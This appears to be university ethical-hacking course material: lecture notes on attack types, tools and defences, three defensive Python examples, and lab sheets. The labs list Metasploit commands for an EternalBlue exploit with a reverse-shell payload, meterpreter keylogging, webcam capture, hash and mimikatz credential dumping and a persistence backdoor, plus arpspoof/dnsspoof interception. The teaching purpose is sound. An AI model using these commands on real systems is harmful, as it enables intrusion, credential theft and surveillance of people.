The attacker steals a valid session ID and uses it to authenticate himself with the server Stealing Guessing Brute Forcing Stealing Session IDs Command Injection Session ID prediction Session Desynchronization Monitor Sniff Session sniffing Predictable session token Man-in-the-middle attack Man-in-the-browser attack Cross-site script attack Cross-site request forgery attack Session replay attack Session fixation Blind Hijacking UDP Hijacking TCP/IP Hijacking RST Hijacking Man-in-the-Middle: Packet Sniffer IP Spoofing: Source Routed Packets Zaproxy Burp Suite Jhijack DroidSheep DroidSniff A distributed denial-of-service (DDoS) attack involves a multitude of compromised systems attacking a single target, thereby causing denial of service for users of the targeted system. To launch a DDoS attack, an attacker uses botnets and attacks a single system. Volumetric Attacks Fragmentation Attacks TCP State-Exhaustion Attacks Application Layer Attacks Bandwidth Attacks and Service Request Floods SYN Flooding Attack ICMP Flood Attack Peer-to-Peer Attacks Application-Level Flood Attacks Permanent Denial-of-Service Attack Distributed Reflection Denial of Service (DrDoS) Phlashing Sabotage Bricking a system Bots are software applications that run automated tasks over the Internet and perform simple repetitive tasks, such as web spidering and search engine indexing. A botnet is a huge network of the compromised systems and can be used by an attacker to launch denial-of-service attacks HULK Tor’s Hammer Slowloris LOIC XOIC DDOSIM RUDY PyLoris CYS3104 Chapter 11 Hacking Web Servers By Kushantha Gunawardana Web servers include both hardware and software that hosts websites; attackers usually target software vulnerabilities and configuration errors to compromise web servers. 
Network- and OS-level attacks can be well defended against using proper network security measures such as firewalls, IDS, etc.; however, web servers are accessible from anywhere on the web, which makes them less secure and more vulnerable to attacks.

Why web servers get compromised:
  Improper file and directory permissions
  Installing the server with default settings
  Unnecessary services enabled, including content management and remote administration
  Security conflicts with the business ease-of-use case
  Lack of proper security policy, procedures, and maintenance
  Improper authentication with external systems
  Default accounts with their default or no passwords
  Unnecessary default, backup, or sample files
  Misconfiguration in web server, operating systems, and networks
  Bugs in server software, OS, and web applications
  Misconfigured SSL certificates and encryption settings
  Administrative or debugging functions that are enabled or accessible on web servers
  Use of self-signed certificates and default certificates

Web server attacks:
  DoS/DDoS Attacks
  DNS Server Hijacking
  DNS Amplification Attack
  Directory Traversal Attacks
  Man-in-the-Middle/Sniffing Attack
  Phishing Attacks
  Website Defacement
  Web Server Misconfiguration
  HTTP Response Splitting Attack
  Web Cache Poisoning Attack
  SSH Bruteforce Attack

LAB

Materials Needed:
  XP VM image
  Kali Linux VM
  Incident report template (provided)

Task 1: Setting Up the Environment
  Deploy the XP VM and Kali Linux VM:
    Ensure both VMs are on the same virtual network.
    Verify connectivity between the VMs using the ping command.

Task 2: Conducting Vulnerability Scans
  Open the Metasploit Framework on Kali Linux:
    msfconsole
  Perform a Basic Port Scan to Identify Open Ports, using Metasploit's TCP scanner:
    use auxiliary/scanner/portscan/tcp
    set RHOSTS [XP-IP]
    run
  Select and Run Vulnerability Scanners:
    1. FTP Scanner:
       use auxiliary/scanner/ftp/anonymous
       set RHOSTS [XP-IP]
       run
    2. HTTP Scanner:
       use auxiliary/scanner/http/http_version
       set RHOSTS [XP-IP]
       run
    3. SMB Scanner:
       use auxiliary/scanner/smb/smb_version
       set RHOSTS [XP-IP]
       run
    4. SSH Scanner:
       use auxiliary/scanner/ssh/ssh_version
       set RHOSTS [XP-IP]
       run

Task 3: Documenting the Findings
  1. Fill Out the Vulnerability Scan Report Template:
     o Target Information: Record the IP address and any relevant details about the target.
     o Scan Details: Note the types of scans performed.
     o Open Ports and Services: List the open ports and corresponding services detected.
     o Service Versions: Document the versions of the services running on the open ports.
     o Potential Vulnerabilities: Identify any potential vulnerabilities based on the services and versions detected.

Lab 3

Pre-requisite
  1. Start the Kali and Windows XP sessions
  2. Get the Windows XP IP address
     a. ipconfig
  3. Get the Kali IP address
     a. ifconfig
  4. Ensure both VMs are on the same subnet
  5. As you have already done the Metasploit tutorial I will skip the essential scanning parts and move straight to the exploit
  6. Run msfconsole
  7. Search eternalblue
     a. Load the ms17_010 psexec exploit
  8. Load the meterpreter/reverse_tcp payload
  9. Set RHOSTS and RPORT
  10. Run exploit
  11. Once the meterpreter session has started you may start the activities

Activities
Try using the following meterpreter commands and document your results.

Gathering System Information
  1. Get system information
     a. sysinfo
  2. Get User ID
     a. getuid

Session Management
  3. List Active Sessions
     a. sessions -l
  4. Interact with a Specific Session
     a. sessions -i

File System Interaction
  5. Navigate the File System
     a. cd
     b. ls
  6. Download a File
     a. download
  7. Upload a File
     a. upload
  8. Read a file
     a. cat
  9. Delete a file
     a. rm

Screenshots and Webcam
  10. Take a screenshot
     a. screenshot
     b. You can also use screengrab after migrating to a specific program to get application-specific screenshots:
        i. ps to find running programs
        ii. migrate
        iii. screengrab
  11. List webcams
     a. webcam_list
  12. Take a photo from the webcam
     a. webcam_snap

Keylogging and Passwords
  13. Start Keylogger
     a. keyscan_start
  14. Stop Keylogger
     a. keyscan_stop
  15. Dump keystrokes
     a. keyscan_dump
  16. Dump Windows Password Hashes
     a. run post/windows/gather/hashdump
     b. This will output the password hashes stored on the Windows machine. These can be cracked offline using tools like John the Ripper or Hashcat. You may try.
  17. Dump passwords from memory
     a. run post/windows/gather/credentials/mimikatz

Network Pivoting and Tunneling
  18. Port Forwarding
     a. portfwd add -l -p -r

Maintaining Access
  19. Creating a Persistent Backdoor
     a. run persistence -U -i 5 -p 4444 -r

Escalating Privileges
  20. Check for Privilege Escalation
     a. getsystem

Stop session
  21. Exit
     a. exit

Ethical Hacking – Lab 4: ARP and DNS spoofing

Description
Combined ARP and DNS spoofing attack to intercept and alter DNS queries.

Tools Required:
  Kali Linux with arpspoof, dnsspoof, and Wireshark installed.
  Windows XP machine.

Steps
  1. Prepare Kali Linux
     a. Ensure Apache is installed and running
        i. sudo apt-get update
        ii. sudo apt-get install apache2
        iii. sudo systemctl start apache2
        iv. sudo apt-get install dsniff
     b. Create a fake webpage
        i. echo "You have been redirected!" | sudo tee /var/www/html/index.html
  2. Setup ARP Spoofing
     a. Identify the network interface and IPs
        i. ipconfig
        ii. ifconfig
     b. Start ARP spoofing to become the MITM
        i. Determine the gateway IP, then:
           1. route -n
        ii. sudo arpspoof -i eth0 -t [Windows XP IP] [Gateway IP]
        iii. sudo arpspoof -i eth0 -t [Gateway IP] [Windows XP IP]
        iv. Here eth0 should be your interface; you may have to double-check with your ipconfig to see if it's eth0 or wlan0, etc.
  3. Execution of the Attack
     a. Enable IP Forwarding on Kali (to forward packets between the Windows XP machine and the gateway)
        i. echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
     b. Set up DNS Spoofing
        i. Prepare dnsspoof to intercept DNS queries
           1. sudo dnsspoof -i eth0
     c. Monitor the Attack
        i. Launch Wireshark to capture packets
           1. sudo wireshark &
        ii. Filter for DNS and ARP traffic
           1. Enter "arp or dns" in the filter bar to observe both the ARP spoofing activity and the DNS requests and responses
     d. Testing the Attack
        i. On the Windows XP machine, attempt to visit known websites like www.google.com
     e. Stop ARP and DNS spoofing and Apache on Kali
        i. sudo killall arpspoof
        ii. sudo killall dnsspoof
        iii. sudo systemctl stop apache2
     f. Disable IP forwarding
        i. echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward

Guidelines
  Show screenshots of each activity.
  Upload the document on or before 10.00am @ 10th of August.
  Best reports will get 2 extra marks for your results.

1. Intro to Ethical Hacking

Definition: Ethical hacking is all about legally breaking into computers and systems to check out how strong their defenses are. White hat hackers (that’s the good guys) use the same tricks as the bad guys (black hats), but they do it with permission.

Why it Matters:
  o Spotting Weak Spots: Finding issues before real hackers do.
  o Beefing Up Security: Fixing any weak points found.
  o Following the Rules: Making sure the system is up to scratch with legal standards like PCI-DSS or HIPAA.

Examples:
  o Bug Bounty Programs: Companies like Google and Facebook offer rewards for finding bugs.
  o Penetration Testing: Simulating an attack to see how well the defenses hold up.

2. Types of Hackers

Black Hat Hackers:
  o Motivation: Usually after money, causing chaos, or spying.
  o What They Do: Spreading viruses, stealing data, messing with websites.
  o Example: Kevin Mitnick (before he turned into a white hat) - Known for hacking into big companies like IBM and Nokia.

White Hat Hackers:
  o Motivation: To help companies stay safe by improving security.
  o What They Do: Conducting security tests, finding vulnerabilities, participating in bug bounty programs.
  o Example: Charlie Miller - Famous for finding flaws in Apple products.

Gray Hat Hackers:
  o Motivation: A bit of both - they hack without permission but usually don’t mean harm and report what they find.
  o What They Do: Hacking into systems without consent, then telling the company about it.
  o Example: Anonymous - A group known for various "hacktivist" activities.

Note: Gray hat activities are in a gray area (no pun intended) legally and ethically. Some places consider it illegal no matter the intention.

3. Phases of Ethical Hacking

Reconnaissance (Footprinting):
  o Goal: Gather as much info as you can about the target.
  o Methods:
      Passive Recon: No direct contact with the target (e.g., Google Dorking, WHOIS, DNS lookups).
      Active Recon: Directly interacting with the target (e.g., ping sweeps, port scans).
  o Tools: Maltego, Recon-ng.

Scanning:
  o Goal: Find open ports, services, and any potential vulnerabilities.
  o Methods:
      Port Scanning: Identifying open ports (e.g., using Nmap).
      Vulnerability Scanning: Checking for known vulnerabilities (e.g., Nessus or OpenVAS).
  o Tools: Nmap, Nessus, OpenVAS, Nikto.

Gaining Access:
  o Goal: Exploit vulnerabilities to get into the target system.
  o Methods:
      Exploitation: Using tools to exploit vulnerabilities (e.g., buffer overflow, SQL injection).
      Brute Force: Repeatedly guessing passwords or keys.
  o Tools: Metasploit, Hydra, SQLmap.

Maintaining Access:
  o Goal: Stay in the system once you’re in.
  o Methods:
      Backdoors: Installing something that lets you back in later (e.g., Netcat, Meterpreter).
      Privilege Escalation: Getting higher permissions than you originally had.
  o Tools: Netcat, Meterpreter, Cobalt Strike.
Covering Tracks:
  o Goal: Hide any evidence of your activity.
  o Methods:
      Log Manipulation: Deleting or editing log files.
      Timestomp: Changing timestamps on files to avoid detection.
  o Tools: Metasploit, Timestomp, CCleaner.

4. Common Tools in Ethical Hacking

Nmap:
  o What It’s For: Network scanning and finding out what’s open and what’s not.
  o Capabilities: Can identify open ports, services, and even guess what OS the target’s using.

Wireshark:
  o What It’s For: Analyzing network traffic.
  o Capabilities: Captures packets to see what data is being sent around. Super handy for spotting suspicious stuff.

Metasploit:
  o What It’s For: Penetration testing.
  o Capabilities: Packed with exploits, payloads, and all sorts of tools for finding and using vulnerabilities.

John the Ripper:
  o What It’s For: Password cracking.
  o Capabilities: Can guess passwords using brute force or by trying out common words from a dictionary.

Burp Suite:
  o What It’s For: Web app security testing.
  o Capabilities: Can scan websites for vulnerabilities like SQL injection, XSS, and more.

Nessus/OpenVAS:
  o What They’re For: Vulnerability scanning.
  o Capabilities: They scan networks, systems, and apps for known vulnerabilities.

Hydra:
  o What It’s For: Brute force password cracking.
  o Capabilities: Can try to crack passwords over multiple protocols like HTTP, FTP, SMTP, etc.

5. Vulnerabilities and Exploits

Vulnerability:
  o What It Is: A weak spot in a system that a hacker can take advantage of.
  o Examples: Unpatched software, weak passwords, or poorly configured systems.

Exploit:
  o What It Is: A way to take advantage of a vulnerability to gain unauthorized access.
  o Examples:
      RCE (Remote Code Execution): Running code on a remote system.
      SQL Injection: Inserting malicious SQL code to mess with a database.

6. Encryption and Cryptography

Encryption Methods:
  o AES (Advanced Encryption Standard):
      What It’s Used For: Encrypting data. It’s strong and widely used.
      Key Sizes: 128, 192, or 256 bits.
  o RSA (Rivest-Shamir-Adleman):
      What It’s Used For: Securing data transmission, like sending encrypted emails.
      Key Sizes: Usually 2048-bit keys.
  o Symmetric vs. Asymmetric Encryption:
      Symmetric: Same key for encryption and decryption (e.g., AES).
      Asymmetric: Different keys for encryption and decryption (e.g., RSA). RSA is usually used to secure the key exchange rather than the data itself.
  o Hashing Algorithms:
      MD5 and SHA-1: Old but still around. They’ve got vulnerabilities, so they’re not recommended for critical stuff.
      SHA-256: More secure and used in things like blockchain and digital signatures.

SSL/TLS:
  o What It’s For: Encrypting data sent over the internet (like HTTPS).
  o Importance: Keeps your data safe while it’s being transmitted.

7. Network Security Concepts

Firewalls:
  o Types:
      Network-based: Protects entire networks (like a castle wall).
      Host-based: Protects individual devices (like personal armor).
  o Functions: Blocks unauthorized traffic and lets the good stuff through.

Intrusion Detection Systems (IDS):
  o Types:
      NIDS (Network IDS): Monitors network traffic for signs of trouble.
      HIDS (Host IDS): Monitors individual devices for suspicious changes or activity.
  o Examples: Snort, Suricata.

Intrusion Prevention Systems (IPS):
  o What They Do: Like IDS, but they don’t just detect - they block the bad stuff too.
  o Examples: Cisco IPS, Palo Alto Networks.

Honeypots:
  o What They’re For: Luring in attackers so you can study them.
  o Types:
      Low-Interaction: Simulates basic services and captures simple attacks.
      High-Interaction: Provides a more realistic environment and can catch more sophisticated attacks.
  o Benefits:
      Learning: You get to understand what attackers are up to.
      Detection: Spotting new threats before they hit real systems.
  o Risks:
      Attracting Trouble: You might end up inviting real attacks.
      Maintenance: Takes time and effort to keep these things running smoothly.

8.
Social Engineering

What It Is: Tricking people into giving up confidential info or doing something they shouldn’t.

Types:
  o Phishing: Sending fake emails or messages to trick people into giving up info.
  o Spear Phishing: Targeted phishing aimed at specific people or companies.
  o Pretexting: Pretending to be someone else to get info.
  o Baiting: Offering something tempting (like a free USB drive) to trick someone into doing something.
  o Tailgating: Following someone into a restricted area without them noticing.

How to Protect Against It:
  o Training: Keep employees up to date on the latest scams.
  o Verification: Double-check before sharing sensitive info.
  o Email Filters: Use advanced spam filters to catch phishing attempts.

Note: Social engineering tactics evolve all the time. It’s a cat-and-mouse game, so staying updated is key.

9. Types of Cyber Attacks

Denial of Service (DoS) and Distributed Denial of Service (DDoS):
  o What It’s About: Flooding a system or network to make it crash or become unavailable.
  o Methods:
      Flood Attacks: Sending tons of traffic to overwhelm the target.
      Amplification Attacks: Using other servers to increase the amount of traffic.
  o How to Defend: DDoS protection services like Cloudflare, rate limiting, and segmenting the network.

Man-in-the-Middle (MitM):
  o What It Is: Intercepting and potentially altering communication between two parties.
  o Techniques:
      ARP Spoofing: Tricking devices into sending traffic to the attacker’s machine.
      SSL Stripping: Downgrading HTTPS connections to HTTP to intercept data.
  o How to Defend: Use HTTPS with strong certificates, VPNs, and mutual authentication. SSL stripping is getting harder to pull off, especially with HSTS in place.

SQL Injection:
  o What It Is: Injecting malicious SQL code into a query to manipulate the database.
  o Where It Happens: Mostly in web apps with input fields that aren’t properly secured.
  o How to Defend: Use prepared statements, parameterized queries, and sanitize inputs.
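The ARP spoofing technique in the MitM item above is exactly what Lab 4 runs with arpspoof and dnsspoof, so here is the defender's side of that lab as an added example (not part of the course or of the dsniff tools). arpspoof keeps re-sending ARP replies that bind the gateway's IP, and the victim's IP, to the Kali machine's MAC; dnsspoof answers lookups for public names with Kali's own LAN address. Both leave simple traces: an IP whose MAC changes, one MAC claiming several IPs, and a public hostname resolving into the local subnet. The ARP replies, DNS answers, MAC addresses and the 192.168.1.0/24 lab subnet are all constructed for the example.

```python
"""Defender-side detection for the ARP and DNS spoofing performed in Lab 4.

arpspoof repeatedly sends ARP replies binding the gateway's IP (and the
victim's IP) to the attacker's MAC; dnsspoof answers DNS queries with the
attacker's own address. Both leave simple, checkable traces.
"""
import ipaddress
from collections import defaultdict

LAN = ipaddress.ip_network("192.168.1.0/24")   # assumed lab subnet

# Constructed ARP replies as seen on the wire: (seconds, sender_ip, sender_mac)
ARP_REPLIES = [
    (0.0, "192.168.1.1", "00:11:22:33:44:01"),    # real gateway
    (0.5, "192.168.1.20", "00:11:22:33:44:20"),   # Windows XP victim
    (30.0, "192.168.1.1", "00:11:22:33:44:66"),   # Kali now claims the gateway IP
    (30.1, "192.168.1.20", "00:11:22:33:44:66"),  # ...and the victim IP (both directions)
    (32.0, "192.168.1.1", "00:11:22:33:44:66"),   # arpspoof repeats the reply periodically
]


def detect_arp_spoofing(replies):
    """Alert when an IP's MAC changes, and when one MAC has claimed more than one IP."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"time": ts, "type": "mac_change", "ip": ip,
                           "old_mac": previous, "new_mac": mac})
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:          # alert once per newly claimed IP
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append({"time": ts, "type": "multi_ip_mac", "mac": mac,
                               "ips": sorted(mac_to_ips[mac])})
    return alerts


# Constructed DNS answers: (queried name, answer IP). 203.0.113.7 stands in for
# the real public address; 192.168.1.30 is the Kali machine's LAN address.
DNS_ANSWERS = [
    ("www.google.com", "203.0.113.7"),
    ("www.google.com", "192.168.1.30"),
]


def suspicious_dns_answers(answers, lan=LAN):
    """Public hostnames should not resolve into the local LAN; after dnsspoof they do."""
    return [(name, ip) for name, ip in answers
            if ipaddress.ip_address(ip) in lan and not name.endswith(".local")]


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES):
        print(alert)
    print(suspicious_dns_answers(DNS_ANSWERS))
```

In a real deployment the ip_to_mac baseline would be seeded from a trusted table (static entries, or the DHCP server's leases) rather than learned from the first reply seen, since the attacker may already be active when monitoring starts; the DNS check would also exclude the organisation's own internal zones, which legitimately resolve into the LAN. The same MAC-change signal is what ARP inspection features on managed switches act on.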
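The SQL injection defence just listed and the cross-site scripting defence in the next item rest on the same idea: user input must stay data and never be spliced into SQL text or HTML markup. The added example below, which is not part of the course material, puts a string-built query beside its parameterized form and unescaped comment rendering beside the escaped form, and adds a Content Security Policy header as a second layer for the XSS case. The users table, the comment text and the search-box template are constructed for the example, and the "hashes" in the table are placeholders, not real digests.

```python
"""Injection defences for SQL injection and cross-site scripting: keep user
input as data (placeholders, escaping) instead of splicing it into code.
The database and comment inputs are constructed for this example.
"""
import html
import secrets
import sqlite3


def make_db():
    """Constructed users table; the password_hash values are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "placeholder-hash-1"), ("bob", "placeholder-hash-2")])
    return conn


def find_user_vulnerable(conn, username):
    # Input spliced into the SQL text: a quote in username rewrites the WHERE clause.
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query)]


def find_user_safe(conn, username):
    # Placeholder: the value travels separately from the statement and is only ever data.
    rows = conn.execute("SELECT username FROM users WHERE username = ?", (username,))
    return [row[0] for row in rows]


def render_comment_unsafe(text):
    return f"<li>{text}</li>"                # stored XSS: markup in text becomes markup


def render_comment_safe(text):
    return f"<li>{html.escape(text, quote=True)}</li>"   # markup becomes visible text


def render_search_box(query):
    # Attribute context (reflected XSS): quote=True also escapes the double quote,
    # so the value cannot close the attribute and add event handlers.
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def new_nonce():
    return secrets.token_urlsafe(16)


def csp_header(nonce):
    """Second layer: a script only runs if its tag carries this response's nonce,
    so an injected inline <script> is ignored even where escaping was missed."""
    return ("Content-Security-Policy: default-src 'self'; "
            f"script-src 'self' 'nonce-{nonce}'; object-src 'none'; base-uri 'none'")


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"
    print("string-built query:", find_user_vulnerable(db, probe))
    print("parameterized query:", find_user_safe(db, probe))
    print(render_comment_safe("<script>alert(1)</script>"))
    print(csp_header(new_nonce()))
```

The tautology probe returns every row from the string-built query and nothing from the parameterized one. Note what "sanitize inputs" buys and what it does not: escaping belongs at the output boundary and must match the context (HTML body versus attribute versus URL), which is why the example escapes in the render functions rather than on the way into storage.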
Cross-Site Scripting (XSS):
  o What It Is: Injecting malicious scripts into web pages viewed by other users.
  o Types:
      Stored XSS: The malicious script is saved on the server and affects everyone.
      Reflected XSS: The malicious script is reflected off a web server, usually via a query parameter.
  o How to Defend: Sanitize input, escape output, and use Content Security Policy (CSP).

Buffer Overflow:
  o What It Is: Overwriting a part of memory to execute malicious code.
  o Methods:
      Stack Overflow: Overflows a buffer on the stack.
      Heap Overflow: Overflows a buffer on the heap.
  o How to Defend: Write secure code, use ASLR (Address Space Layout Randomization), and stack canaries.

10. Penetration Testing Process

Planning and Recon:
  o Goal: Set the scope, objectives, and rules for the pen test.
  o Methods:
      Stakeholder Interviews: Find out what’s important and needs protection.
      Legal Checks: Make sure everything is legally sound and authorized.

Scanning:
  o Goal: Identify systems, services, and any possible weak spots.
  o Methods:
      Network Mapping: Using tools like Nmap to see what’s out there.
      Vulnerability Scanning: Tools like Nessus to find known weaknesses.

Exploitation:
  o Goal: Try to gain unauthorized access.
  o Methods:
      Manual Exploitation: Using knowledge of vulnerabilities to craft specific attacks.
      Automated Tools: Using frameworks like Metasploit to run known exploits.

Post-Exploitation:
  o Goal: See how deep you can go and the potential impact.
  o Methods:
      Privilege Escalation: Getting more control in the system.
      Data Exfiltration: Simulating stealing sensitive data.
      Lateral Movement: Moving across the network to access more systems.
      Persistence: Setting up a way to get back in later.

Reporting:
  o Goal: Document everything you found and suggest fixes.
  o What to Include:
      Executive Summary: Overview for non-tech folks.
      Technical Report: Detailed findings and technical suggestions.
      Fix-It Plan: How to fix the problems you found.

11.
Legal and Ethical Considerations

Authorization: Always get explicit written permission before starting anything. This is not negotiable.
Compliance: Know the laws and rules that apply to your work, like CFAA in the U.S. or GDPR in Europe.
Documentation: Keep detailed records of everything you do during a test, just in case.
Ethical Rules:
  o Honesty: Be transparent about what you’re doing and what you find.
  o Confidentiality: Keep any sensitive info you come across safe and secure.
  o Professionalism: Always act in a professional and ethical way.

12. Real-World Applications and Case Studies

Case Study 1: Target Data Breach:
  o What Happened: Hackers got in through a third-party vendor (HVAC) and installed malware on Target’s payment systems, stealing 40 million credit card numbers.
  o Lesson Learned: Third-party access needs to be locked down tight, and network segmentation is crucial to limit damage if someone does get in.

Case Study 2: Equifax Data Breach:
  o What Happened: A vulnerability in a web application was exploited, leading to the exposure of data for over 147 million people.
  o Lesson Learned: Timely patching is critical, and regular vulnerability scans are a must.

Best Practices:
  o Defense in Depth: Layer your security controls to make it harder for attackers to succeed.
  o Zero Trust Architecture: Don’t trust anyone or anything by default, and always verify.
  o Continuous Monitoring: Keep an eye on your network and systems all the time, and have a solid incident response plan ready to go.
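Two earlier points in these notes deserve a worked illustration: the Lab 3 remark that dumped Windows password hashes can be cracked offline with John the Ripper or Hashcat, and section 6's warning that MD5 and SHA-1 are not recommended. The added example below is not part of the course material. It shows why an unsalted, fast hash falls to a single table lookup once it has been dumped, and what a credential store should do instead: a per-record random salt, a deliberately slow key derivation (PBKDF2-HMAC-SHA256 from the standard library) and a constant-time comparison. The wordlist, the accounts and the record format are constructed; the iteration count follows the current OWASP Password Storage Cheat Sheet figure for PBKDF2-HMAC-SHA256.

```python
"""Credential storage that resists offline cracking of a dumped hash: salted,
slow PBKDF2-HMAC-SHA256 with a constant-time check, beside an unsalted MD5
record of the kind a legacy system keeps. Wordlist and accounts are constructed.
"""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000   # OWASP Password Storage Cheat Sheet figure for PBKDF2-HMAC-SHA256

COMMON_WORDS = ["password", "Password1", "letmein", "qwerty", "welcome"]   # constructed wordlist


def md5_record(password):
    """What a legacy store keeps: same password -> same digest, no salt, and fast."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5_by_lookup(digest, words=COMMON_WORDS):
    """One table lookup reverses an unsalted fast hash for any word on the list.
    This is why a dumped hash of this kind is as good as the password itself."""
    table = {md5_record(w): w for w in words}
    return table.get(digest)


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted and slow: every record needs its own work, so one table serves nobody."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algorithm, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False                       # malformed record is never a match
    if algorithm != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    dumped = md5_record("Password1")
    print("dumped MD5 reversed to:", crack_md5_by_lookup(dumped))
    record = hash_password("Password1")
    print("stored record:", record)
    print("login ok:", verify_password("Password1", record))
    print("wrong password ok:", verify_password("Password2", record))
```

Two users who choose the same password get identical MD5 records but different PBKDF2 records, because the salt differs, and the iteration count turns each guess from a nanosecond hash into a deliberate delay. Windows itself stores NT hashes unsalted, which is why the Lab 3 hashdump output is worth cracking in the first place and why the real defences there are long passphrases and keeping attackers away from the SAM and LSASS memory.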